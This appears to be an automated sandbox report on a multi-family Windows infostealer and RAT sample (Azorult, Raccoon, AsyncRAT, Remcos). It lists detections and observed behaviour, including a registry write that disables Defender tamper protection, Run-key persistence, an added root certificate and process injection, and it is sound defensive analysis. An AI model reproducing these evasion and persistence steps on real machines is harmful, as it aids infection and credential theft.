Malware Analysis Report

2024-09-22 21:55

Sample ID 210813-1qhgx2qah2
Target ED4D2E0F901BC478BE16D3DAD0D02792.exe
SHA256 959e3ca2579b6be8a11c06763c5a34ec118abc96d869e25bef06319c92da465e
Tags
asyncrat azorult oski raccoon remcos 08082021 fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery evasion infostealer persistence rat spyware stealer suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

959e3ca2579b6be8a11c06763c5a34ec118abc96d869e25bef06319c92da465e

Threat Level: Known bad

The file ED4D2E0F901BC478BE16D3DAD0D02792.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat azorult oski raccoon remcos 08082021 fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery evasion infostealer persistence rat spyware stealer suricata trojan

Azorult

Raccoon Stealer Payload

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M3

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Modifies Windows Defender Real-time Protection settings

Raccoon

Remcos

Contains code to disable Windows Defender

Oski

AsyncRat

Async RAT payload

Executes dropped EXE

Downloads MZ/PE file

Loads dropped DLL

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Deletes itself

Windows security modification

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Suspicious behavior: MapViewOfSection

Delays execution with timeout.exe

Checks processor information in registry

Suspicious use of WriteProcessMemory

Modifies system certificate store

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2021-08-13 11:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-13 11:33

Reported

2021-08-13 11:36

Platform

win7v20210408

Max time kernel

152s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

Remcos

rat remcos

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M3

suricata

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 684 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 684 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 684 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 684 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2016 wrote to memory of 2044 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 684 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 684 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 684 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 684 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 684 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2040 wrote to memory of 756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1732 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
PID 1732 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
PID 1732 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
PID 1732 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
PID 1732 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
PID 1732 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
PID 1732 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
PID 1732 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
PID 1732 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
PID 1732 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
PID 1732 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
PID 1732 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
PID 756 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 756 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 756 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 756 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1784 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1784 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1784 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1784 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1732 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
PID 1732 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
PID 1732 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
PID 1732 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
PID 1732 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1732 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1732 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1732 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1732 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1620 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1620 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1620 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1620 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
PID 1480 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
